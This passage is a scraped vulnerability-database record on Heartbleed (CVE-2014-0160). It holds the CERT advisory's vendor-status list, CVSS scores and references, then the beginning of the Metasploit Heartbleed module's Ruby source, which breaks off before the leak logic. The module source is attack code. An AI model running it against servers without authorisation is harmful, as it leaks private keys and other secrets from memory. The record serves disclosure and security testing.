fixes, at the online support web site <https://support.windriver.com/>\n\n### Vendor References\n\n * <https://support.windriver.com/>\n\n### nginx __ Affected\n\nUpdated: April 11, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://nginx.com/blog/nginx-and-the-heartbleed-vulnerability/>\n\n### Addendum\n\nnginx for Windows is statically linked with the OpenSSL library. We have confirmed that nginx versions 1.2.9 through 1.4.7 on Windows provide a vulnerable OpenSSL version.\n\nnginx 1.4.7, which was originally released on March 18, 2014, was silently repackaged with OpenSSL 1.0.1g on April 8, 2014. \nnginx 1.5.13 was officially released on April 8, 2014, and it also includes OpenSSL 1.0.1g, despite not specifically mentioning this vulnerability.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### openSUSE project Affected\n\nUpdated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html>\n\n### pfSENSE Affected\n\nUpdated: April 17, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://blog.pfsense.org/?p=1253>\n\n### Brocade __ Not Affected\n\nUpdated: April 11, 2014 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the 
vendor.\n\n### Vendor Information \n\n`TECHNICAL SUPPORT BULLETIN \nApril 10, 2014 \n________________________________________ \nTSB 2014-185-A \nSEVERITY: Low - Information \n________________________________________ \nPRODUCTS AFFECTED: \nAll Brocade products, including Vyatta \n \nCORRECTED IN RELEASE: \nAll current releases of Brocade products, including Vyatta \n \nBULLETIN OVERVIEW \n \nThe purpose of this bulletin is to provide information regarding the recently \ndisclosed vulnerability in the OpenSSL protocol documented by CVE-2014-0160 and \nalso known as \"The Heartbleed bug.\" This vulnerability takes advantage of the \nheartbeat extensions to the OpenSSL protocol (RFC6520). \n \nBrocade's family of IP products ADX, FCX, ICX, MLX, MLX-E, XMR CES, CER, RX, \nSX, VDX offering ServerIron, FastIron, NetIron, RX, Network OS, Brocade Network \nAdvisor, Vyatta and vADX software and SAN products offering FOS software do not \nmake use of the heartbeat extensions and hence are not vulnerable to the \nexploit documented in CVE-2014-0160. \nIn addition, the MyBrocade.com web site does not use OpenSSL and is not \nvulnerable to this issue. \n \n \nPROBLEM STATEMENT \nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not \nproperly handle Heartbeat Extension packets, which allows remote attackers to \nobtain sensitive information from process memory via crafted packets that \ntrigger a buffer over-read, as demonstrated by reading private keys, related to \nd1_both.c and t1_lib.c, aka the Heartbleed bug. \n<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160> \n \nRISK ASSESSMENT \nThere is no risk using Brocade products \nSYMPTOMS \nNot applicable. \nWORKAROUND \nNo workaround is necessary. 
\nCORRECTIVE ACTION \nNot applicable.`\n\n### EfficientIP __ Not Affected\n\nUpdated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nOur system uses FreeBSD 9.2 as its basis, and the OpenSSL version shipped with this version (0.9.8y) is stated not to be affected.\n\n### Foundry Networks, Inc. __ Not Affected\n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nNo Brocade (Foundry) products are affected by this vulnerability.\n\n### Addendum\n\nFoundry was purchased by Brocade.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### Infoblox __ Not Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nInfoblox is not affected by this issue (in any released version).\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Microsoft Corporation __ Not Affected\n\nNotified: April 08, 2014 Updated: April 21, 2014 \n\n**Statement Date: April 21, 2014**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nMicrosoft Services unaffected by OpenSSL \u201cHeartbleed\u201d vulnerability.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://blogs.technet.com/b/security/archive/2014/04/10/microsoft-devices-and-services-and-the-openssl-heartbleed-vulnerability.aspx>\n\n### Opengear Not Affected\n\nUpdated: April 15, 2014 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a 
statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://opengear.zendesk.com/entries/51667116-CVE-2014-0160-aka-Heartbleed-Opengear-products-are-not-affected>\n\n### Openwall GNU/*/Linux __ Not Affected\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nOpenwall GNU/*/Linux is not affected. The versions of OpenSSL that we redistribute do not contain the vulnerable code.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Peplink __ Not Affected\n\nNotified: April 08, 2014 Updated: April 18, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPeplink products are NOT affected by this vulnerability.\n\n### Vendor References\n\n * <https://forum.peplink.com/threads/3062-Special-Notice-On-OpenSSL-Heartbleed-Vulnerability>\n\n### Quagga __ Not Affected\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nQuagga is not affected by this vulnerability.\n\n### SUSE Linux __ Not Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html>\n\n### Addendum\n\nSUSE Enterprise Linux uses OpenSSL 0.9.x\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us 
[email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### Vyatta __ Not Affected\n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\n`TECHNICAL SUPPORT BULLETIN \nApril 10, 2014 \n________________________________________ \nTSB 2014-185-A \nSEVERITY: Low - Information \n________________________________________ \nPRODUCTS AFFECTED: \nAll Brocade products, including Vyatta \n \nCORRECTED IN RELEASE: \nAll current releases of Brocade products, including Vyatta \n \nBULLETIN OVERVIEW \n \nThe purpose of this bulletin is to provide information regarding the recently \ndisclosed vulnerability in the OpenSSL protocol documented by CVE-2014-0160 and \nalso known as \"The Heartbleed bug.\" This vulnerability takes advantage of the \nheartbeat extensions to the OpenSSL protocol (RFC6520). \n \nBrocade's family of IP products ADX, FCX, ICX, MLX, MLX-E, XMR CES, CER, RX, \nSX, VDX offering ServerIron, FastIron, NetIron, RX, Network OS, Brocade Network \nAdvisor, Vyatta and vADX software and SAN products offering FOS software do not \nmake use of the heartbeat extensions and hence are not vulnerable to the \nexploit documented in CVE-2014-0160. \nIn addition, the MyBrocade.com web site does not use OpenSSL and is not \nvulnerable to this issue. \n \n \nPROBLEM STATEMENT \nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not \nproperly handle Heartbeat Extension packets, which allows remote attackers to \nobtain sensitive information from process memory via crafted packets that \ntrigger a buffer over-read, as demonstrated by reading private keys, related to \nd1_both.c and t1_lib.c, aka the Heartbleed bug. \n``<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160>`` \n \nRISK ASSESSMENT \nThere is no risk using Brocade products \nSYMPTOMS \nNot applicable. \nWORKAROUND \nNo workaround is necessary. 
\nCORRECTIVE ACTION \nNot applicable.`\n\n### WSO2 __ Not Affected\n\nUpdated: April 15, 2014 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nOn April 7th, a Security Advisory was issued by the OpenSSL project notifying the public of a serious vulnerability in the encryption software used by a majority of websites on the Internet.\n\n[http://connect.wso2.com/wso2/c/secadv_20140407.txt?_lid=62396&_cid=77097&_t=859269](<http://connect.wso2.com/wso2/c/secadv_20140407.txt?_lid=62396&_cid=77097&_t=859269>) \n \nWe want you to know that our servers were not exposed and your WSO2 account is completely safe. Nevertheless, to ensure there is no additional risk, we strongly encourage you to request a new password. \n[http://connect.wso2.com/wso2/c/password?_lid=62397&_cid=77097&_t=859269](<http://connect.wso2.com/wso2/c/password?_lid=62397&_cid=77097&_t=859269>) \n \nIf you have any questions or concerns, please email security@wso2.com. 
\n \nFor additional information regarding this vulnerability, please visit: \n[http://connect.wso2.com/wso2/c/heartbleed.com?_lid=62398&_cid=77097&_t=859269](<http://connect.wso2.com/wso2/c/heartbleed.com?_lid=62398&_cid=77097&_t=859269>)\n\n### m0n0wall __ Not Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nm0n0wall is not affected (as it uses OpenSSL 0.9.8).\n\n### ACCESS Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### AT&T Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Alcatel-Lucent Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Apple Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Avaya, Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Barracuda Networks Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Belkin, Inc. 
Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Charlotte's Web Networks Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Check Point Software Technologies Unknown\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk100173](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk100173>)\n\n### Cray Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### D-Link Systems, Inc. 
Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### DragonFly BSD Project Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### EMC Corporation Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Engarde Secure Linux Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Enterasys Networks Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Ericsson Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Force10 Networks, Inc. 
Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fujitsu Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM Corporation (zseries) Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM eServer Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Internet Security Systems, Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Intoto Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### MontaVista Software, Inc. 
Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### NEC Corporation __ Unknown\n\nNotified: April 08, 2014 Updated: April 30, 2014 \n\n**Statement Date: April 30, 2014**\n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe provide information on this issue at the following URL\n\n<http://jpn.nec.com/security-info/av14-001.html> (only in Japanese)\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://jpn.nec.com/security-info/av14-001.html>\n\n### Nokia Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Novell, Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Palo Alto Networks Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Process Software Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Q1 Labs Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### QNX Software Systems Inc. 
Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SafeNet Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SmoothWall Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Snort Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sony Corporation Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sourcefire Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Stonesoft Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### The SCO Group Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### TippingPoint Technologies Inc. 
Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Turbolinux Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Watchguard Technologies, Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### ZyXEL Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### eSoft, Inc. Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### netfilter Unknown\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 5 | AV:N/AC:L/Au:N/C:P/I:N/A:N \nTemporal | 4.1 | E:F/RL:OF/RC:C \nEnvironmental | 6.5 | CDP:LM/TD:H/CR:H/IR:H/AR:ND \n \n \n\n\n### References \n\n * <http://heartbleed.com/>\n * <http://seclists.org/oss-sec/2014/q2/22>\n * <http://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>\n * <https://tools.ietf.org/html/rfc6520>\n * <http://www.openssl.org/news/openssl-1.0.1-notes.html>\n * <http://www.hut3.net/blog/cns---networks-security/2014/04/14/bugs-in-heartbleed-detection-scripts->\n * <http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html>\n * 
<http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/>\n * <https://www.cert.fi/en/reports/2014/vulnerability788210.html>\n * <http://xkcd.com/1354/>\n * <https://code.google.com/p/mod-spdy/issues/detail?id=85>\n * <http://www.exploit-db.com/exploits/32745/>\n * <https://access.redhat.com/security/cve/CVE-2014-0160>\n * <http://www.ubuntu.com/usn/usn-2165-1/>\n * <http://www.freshports.org/security/openssl/>\n * <https://blog.torproject.org/blog/openssl-bug-cve-2014-0160>\n\n### Acknowledgements\n\nThis vulnerability was reported by OpenSSL, who in turn credits Riku, Antti and Matti at Codenomicon and Neel Mehta of Google Security.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-0160](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-0160>) \n---|--- \n**Date Public:** | 2014-04-07 \n**Date First Published:** | 2014-04-08 \n**Date Last Updated: ** | 2016-05-13 15:26 UTC \n**Document Revision: ** | 178 \n", "modified": "2016-05-13T15:26:00", "published": "2014-04-08T00:00:00", "id": "VU:720951", "href": "https://www.kb.cert.org/vuls/id/720951", "type": "cert", "title": "OpenSSL TLS heartbeat extension read overflow discloses sensitive information", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-01-03T21:23:15", "description": "This Metasploit module implements the OpenSSL Heartbleed attack. The problem exists in the handling of heartbeat requests, where a fake length can be used to leak memory data in the response. 
Services that support STARTTLS may also be vulnerable.", "edition": 2, "published": "2014-04-10T00:00:00", "type": "zdt", "title": "OpenSSL Heartbeat (Heartbleed) Information Leak Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-10T00:00:00", "id": "1337DAY-ID-22129", "href": "https://0day.today/exploit/description/22129", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Auxiliary::Scanner\r\n include Msf::Auxiliary::Report\r\n\r\n CIPHER_SUITES = [\r\n 0xc014, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\r\n 0xc00a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA\r\n 0xc022, # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA\r\n 0xc021, # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA\r\n 0x0039, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA\r\n 0x0038, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA\r\n 0x0088, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA\r\n 0x0087, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA\r\n 0x0087, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA\r\n 0xc00f, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA\r\n 0x0035, # TLS_RSA_WITH_AES_256_CBC_SHA\r\n 0x0084, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA\r\n 0xc012, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc008, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc01c, # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA\r\n 0xc01b, # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0x0016, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0x0013, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA\r\n 0xc00d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc003, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA\r\n 0x000a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc013, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA\r\n 0xc009, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA\r\n 0xc01f, # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA\r\n 0xc01e, # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA\r\n 0x0033, # 
TLS_DHE_RSA_WITH_AES_128_CBC_SHA\r\n 0x0032, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA\r\n 0x009a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA\r\n 0x0099, # TLS_DHE_DSS_WITH_SEED_CBC_SHA\r\n 0x0045, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA\r\n 0x0044, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA\r\n 0xc00e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA\r\n 0xc004, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA\r\n 0x002f, # TLS_RSA_WITH_AES_128_CBC_SHA\r\n 0x0096, # TLS_RSA_WITH_SEED_CBC_SHA\r\n 0x0041, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA\r\n 0xc011, # TLS_ECDHE_RSA_WITH_RC4_128_SHA\r\n 0xc007, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA\r\n 0xc00c, # TLS_ECDH_RSA_WITH_RC4_128_SHA\r\n 0xc002, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA\r\n 0x0005, # TLS_RSA_WITH_RC4_128_SHA\r\n 0x0004, # TLS_RSA_WITH_RC4_128_MD5\r\n 0x0015, # TLS_DHE_RSA_WITH_DES_CBC_SHA\r\n 0x0012, # TLS_DHE_DSS_WITH_DES_CBC_SHA\r\n 0x0009, # TLS_RSA_WITH_DES_CBC_SHA\r\n 0x0014, # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0011, # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0008, # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0006, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5\r\n 0x0003, # TLS_RSA_EXPORT_WITH_RC4_40_MD5\r\n 0x00ff # Unknown\r\n ]\r\n\r\n HANDSHAKE_RECORD_TYPE = 0x16\r\n HEARTBEAT_RECORD_TYPE = 0x18\r\n ALERT_RECORD_TYPE = 0x15\r\n TLS_VERSION = {\r\n '1.0' => 0x0301,\r\n '1.1' => 0x0302,\r\n '1.2' => 0x0303\r\n }\r\n\r\n TTLS_CALLBACKS = {\r\n 'SMTP' => :tls_smtp,\r\n 'IMAP' => :tls_imap,\r\n 'JABBER' => :tls_jabber,\r\n 'POP3' => :tls_pop3\r\n }\r\n\r\n def initialize\r\n super(\r\n 'Name' => 'OpenSSL Heartbeat (Heartbleed) Information Leak',\r\n 'Description' => %q{\r\n This module implements the OpenSSL Heartbleed attack. The problem\r\n exists in the handling of heartbeat requests, where a fake length can\r\n be used to leak memory data in the response. 
Services that support\r\n STARTTLS may also be vulnerable.\r\n },\r\n 'Author' => [\r\n 'Neel Mehta', # Vulnerability discovery\r\n 'Riku', # Vulnerability discovery\r\n 'Antti', # Vulnerability discovery\r\n 'Matti', # Vulnerability discovery\r\n 'Jared Stafford <jspenguin[at]jspenguin.org>', # Original Proof of Concept. This module is based on it.\r\n 'FiloSottile', # PoC site and tool\r\n 'Christian Mehlmauer', # Msf module\r\n 'wvu', # Msf module\r\n 'juan vazquez' # Msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-0160'],\r\n ['US-CERT-VU', '720951'],\r\n ['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A'],\r\n ['URL', 'http://heartbleed.com/'],\r\n ['URL', 'https://github.com/FiloSottile/Heartbleed'],\r\n ['URL', 'https://gist.github.com/takeshixx/10107280'],\r\n ['URL', 'http://filippo.io/Heartbleed/']\r\n ],\r\n 'DisclosureDate' => 'Apr 7 2014',\r\n 'License' => MSF_LICENSE\r\n )\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3' ]]),\r\n OptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']])\r\n ], self.class)\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('XMPPDOMAIN', [ true, 'The XMPP Domain to use when Jabber is selected', 'localhost' ])\r\n ], self.class)\r\n\r\n end\r\n\r\n def peer\r\n \"#{rhost}:#{rport}\"\r\n end\r\n\r\n def tls_smtp\r\n # https://tools.ietf.org/html/rfc3207\r\n sock.get_once\r\n sock.put(\"EHLO #{Rex::Text.rand_text_alpha(10)}\\n\")\r\n res = sock.get_once\r\n\r\n unless res && res =~ /STARTTLS/\r\n return nil\r\n end\r\n sock.put(\"STARTTLS\\n\")\r\n sock.get_once\r\n end\r\n\r\n def tls_imap\r\n # http://tools.ietf.org/html/rfc2595\r\n sock.get_once\r\n sock.put(\"a001 CAPABILITY\\r\\n\")\r\n res = sock.get_once\r\n unless res && res =~ /STARTTLS/i\r\n return nil\r\n end\r\n sock.put(\"a002 STARTTLS\\r\\n\")\r\n 
